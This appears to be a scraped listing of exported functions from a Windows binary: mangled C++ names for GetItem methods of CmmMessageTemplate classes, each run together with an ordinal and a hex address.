              ?GetItem2@?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26590x417c00
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAEAAHXZ26600x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEAAIXZ26610x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26620x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26630x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@_J@Archive@Cmm@@QAEAA_JXZ26640x418730
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEAAHXZ26650x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEAAIXZ26660x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26670x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V?$CStringT@D@2@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26680x417570
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAEAA_JXZ26690x418730
              ?GetItem2@?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@QAEAA_KXZ26700x418730
              ?GetItem2@?$CmmMessageTemplate_2@_JH@Archive@Cmm@@QAEAAHXZ26710x418930
              ?GetItem2@?$CmmMessageTemplate_2@_JV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26720x418930
              ?GetItem2@?$CmmMessageTemplate_2@_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26730x418930
              ?GetItem3@?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAEAAHXZ26740x418730
              ?GetItem3@?$CmmMessageTemplate_3@HHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26750x418730
              ?GetItem3@?$CmmMessageTemplate_3@HIH@Archive@Cmm@@QAEAAHXZ26760x418730
              ?GetItem3@?$CmmMessageTemplate_3@HII@Archive@Cmm@@QAEAAIXZ26770x418730
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@H@Archive@Cmm@@QAEAAHXZ26780x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEAAIXZ26790x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26800x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEAAHXZ26810x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEAAIXZ26820x418390
              ?GetItem3@?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26830x418390
              ?GetItem3@?$CmmMessageTemplate_3@H_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26840x418950
              ?GetItem3@?$CmmMessageTemplate_3@IHI@Archive@Cmm@@QAEAAIXZ26850x418730
              ?GetItem3@?$CmmMessageTemplate_3@IHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26860x418730
              ?GetItem3@?$CmmMessageTemplate_3@IIH@Archive@Cmm@@QAEAAHXZ26870x418730
              ?GetItem3@?$CmmMessageTemplate_3@III@Archive@Cmm@@QAEAAIXZ26880x418730
              ?GetItem3@?$CmmMessageTemplate_3@IIV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26890x418730
              ?GetItem3@?$CmmMessageTemplate_3@IV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26900x418390
              ?GetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAEAAHXZ26910x418390
              ?GetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAEAAIXZ26920x418390
              ?GetItem3@?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26930x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HH@Archive@Cmm@@QAEAAHXZ26940x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26950x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@H_J@Archive@Cmm@@QAEAA_JXZ26960x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@QAEAAHXZ26970x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@QAEAAIXZ26980x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26990x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@I@Archive@Cmm@@QAEAAIXZ27000x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27010x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27020x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@_JV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27030x418760
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HH@Archive@Cmm@@QAEAAHXZ27040x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HI@Archive@Cmm@@QAEAAIXZ27050x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27060x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV?$CStringT@D@2@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27070x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IH@Archive@Cmm@@QAEAAHXZ27080x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@II@Archive@Cmm@@QAEAAIXZ27090x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27100x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@I_J@Archive@Cmm@@QAEAA_JXZ27110x418390
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEAAHXZ27120x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27130x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@_J@Archive@Cmm@@QAEAA_JXZ27140x417f30
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_JI@Archive@Cmm@@QAEAAIXZ27150x418760
              ?GetItem3@?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@_J_J@Archive@Cmm@@QAEAA_JXZ27160x418760
              ?GetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEAAIXZ27170x418760
              ?GetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27180x418760
              ?GetItem3@?$CmmMessageTemplate_3@_JV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27190x418760
              ?GetItem4@?$CmmMessageTemplate_4@HHHH@Archive@Cmm@@QAEAAHXZ27200x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@HHHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27210x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@HIHI@Archive@Cmm@@QAEAAIXZ27220x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@II@Archive@Cmm@@QAEAAIXZ27230x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@H@Archive@Cmm@@QAEAAHXZ27240x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27250x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27260x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEAAHXZ27270x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27280x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@IHIH@Archive@Cmm@@QAEAAHXZ27290x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@IHII@Archive@Cmm@@QAEAAIXZ27300x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@IHV?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAEAA_JXZ27310x418600
              ?GetItem4@?$CmmMessageTemplate_4@IIII@Archive@Cmm@@QAEAAIXZ27320x4190a0
              ?GetItem4@?$CmmMessageTemplate_4@IIV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAEAAIXZ27330x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@IV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27340x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@IV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27350x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHH@Archive@Cmm@@QAEAAHXZ27360x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HHV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27370x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@HV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27380x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27390x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@III@Archive@Cmm@@QAEAAIXZ27400x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IV12@H@Archive@Cmm@@QAEAAHXZ27410x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@IV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27420x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAEAAHXZ27430x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@I@Archive@Cmm@@QAEAAIXZ27440x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27450x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27460x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@_JV12@H@Archive@Cmm@@QAEAAHXZ27470x419ff0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HHH@Archive@Cmm@@QAEAAHXZ27480x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HII@Archive@Cmm@@QAEAAIXZ27490x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@HIV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27500x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IHI@Archive@Cmm@@QAEAAIXZ27510x419ac0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27520x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@I_JI@Archive@Cmm@@QAEAAIXZ27530x418600
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAEAAHXZ27540x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27550x418ba0
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAEAAHXZ27560x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAEAAIXZ27570x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27580x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@V?$CStringT@D@2@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27590x417f50
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@V12@V12@_J@Archive@Cmm@@QAEAA_JXZ27600x41a740
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_JII@Archive@Cmm@@QAEAAIXZ27610x418790
              ?GetItem4@?$CmmMessageTemplate_4@V?$CStringT@_W@Cmm@@_J_JV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27620x418790
              ?GetItem4@?$CmmMessageTemplate_4@_JV?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27630x418790
              ?GetItem4@?$CmmMessageTemplate_4@_JV?$CStringT@D@Cmm@@V12@_J@Archive@Cmm@@QAEAA_JXZ27640x419ff0
              ?GetItem4@?$CmmMessageTemplate_4@_JV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27650x419ff0
              ?GetItem5@?$CmmMessageTemplate_5@HHHHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27660x418600
              ?GetItem5@?$CmmMessageTemplate_5@HHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27670x419af0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@III@Archive@Cmm@@QAEAAIXZ27680x419af0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@D@Cmm@@V12@V12@H@Archive@Cmm@@QAEAAHXZ27690x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@HH@Archive@Cmm@@QAEAAHXZ27700x41a740
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@H@Archive@Cmm@@QAEAAHXZ27710x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27720x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@_K@Archive@Cmm@@QAEAA_KXZ27730x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@IHIHI@Archive@Cmm@@QAEAAIXZ27740x418600
              ?GetItem5@?$CmmMessageTemplate_5@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27750x419ff0
              ?GetItem5@?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27760x41a740
              ?GetItem5@?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAEAAIXZ27770x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27780x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HHV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27790x41a740
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27800x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@_J@Archive@Cmm@@QAEAA_JXZ27810x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IHV12@I@Archive@Cmm@@QAEAAIXZ27820x41a740
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IIIH@Archive@Cmm@@QAEAAHXZ27830x419af0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@IV12@_J@Archive@Cmm@@QAEAA_JXZ27840x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@HH@Archive@Cmm@@QAEAAHXZ27850x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27860x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27870x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@_JV12@HV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ27880x4193a0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HHHH@Archive@Cmm@@QAEAAHXZ27890x419af0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HIIV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27900x419af0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IHIH@Archive@Cmm@@QAEAAHXZ27910x419af0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@I@Archive@Cmm@@QAEAAIXZ27920x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27930x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HHH@Archive@Cmm@@QAEAAHXZ27940x41a740
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27950x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ27960x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@IH@Archive@Cmm@@QAEAAHXZ27970x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@QAEAAIXZ27980x418bd0
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@QAEAAHXZ27990x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28000x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V?$CStringT@D@2@H@Archive@Cmm@@QAEAAHXZ28010x417f80
              ?GetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@_J_JV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28020x4193a0
              ?GetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@IV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28030x4193a0
              ?GetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@V12@_JV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28040x4193a0
              ?GetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAEAAIXZ28050x41a020
              ?GetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28060x41a020
              ?GetItem6@?$CmmMessageTemplate_6@HHHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28070x419b20
              ?GetItem6@?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEAAHXZ28080x41af70
              ?GetItem6@?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28090x41af70
              ?GetItem6@?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@IIII@Archive@Cmm@@QAEAAIXZ28100x419b20
              ?GetItem6@?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28110x4191f0
              ?GetItem6@?$CmmMessageTemplate_6@HV?$CStringT@_W@Cmm@@V12@V12@HH@Archive@Cmm@@QAEAAHXZ28120x4191f0
              ?GetItem6@?$CmmMessageTemplate_6@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28130x41a020
              ?GetItem6@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@IV12@V12@H@Archive@Cmm@@QAEAAHXZ28140x4191f0
              ?GetItem6@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@QAEAAIXZ28150x4191f0
              ?GetItem6@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28160x4198a0
              ?GetItem6@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@_J@Archive@Cmm@@QAEAA_JXZ28170x41c710
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@HV12@V12@V12@H@Archive@Cmm@@QAEAAHXZ28180x4198a0
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28190x418160
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28200x418160
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HHHHH@Archive@Cmm@@QAEAAHXZ28210x419b20
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HIIV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28220x41af70
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IHIHV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28230x419b20
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@II@Archive@Cmm@@QAEAAIXZ28240x4191f0
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J@Archive@Cmm@@QAEAA_JXZ28250x41c710
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@HHHH@Archive@Cmm@@QAEAAHXZ28260x41af70
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@HH@Archive@Cmm@@QAEAAHXZ28270x4198a0
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@H@Archive@Cmm@@QAEAAHXZ28280x418160
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28290x418160
              ?GetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28300x4193d0
              ?GetItem6@?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@IV12@V12@H@Archive@Cmm@@QAEAAHXZ28310x4193d0
              ?GetItem6@?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28320x4193d0
              ?GetItem6@?$CmmMessageTemplate_6@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28330x41a050
              ?GetItem7@?$CmmMessageTemplate_7@HHHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28340x419b50
              ?GetItem7@?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28350x419b50
              ?GetItem7@?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28360x41c710
              ?GetItem7@?$CmmMessageTemplate_7@HV?$CStringT@D@Cmm@@V12@V12@HV12@H@Archive@Cmm@@QAEAAHXZ28370x41f260
              ?GetItem7@?$CmmMessageTemplate_7@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28380x41a050
              ?GetItem7@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@III@Archive@Cmm@@QAEAAIXZ28390x41c710
              ?GetItem7@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@I@Archive@Cmm@@QAEAAIXZ28400x419400
              ?GetItem7@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28410x422ea0
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28420x418190
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@V32@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28430x418190
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HHHHHH@Archive@Cmm@@QAEAAHXZ28440x4247e0
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28450x41c710
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IHIHV12@H@Archive@Cmm@@QAEAAHXZ28460x419b50
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@II_J@Archive@Cmm@@QAEAA_JXZ28470x41c710
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_J@Archive@Cmm@@QAEAA_JXZ28480x422ea0
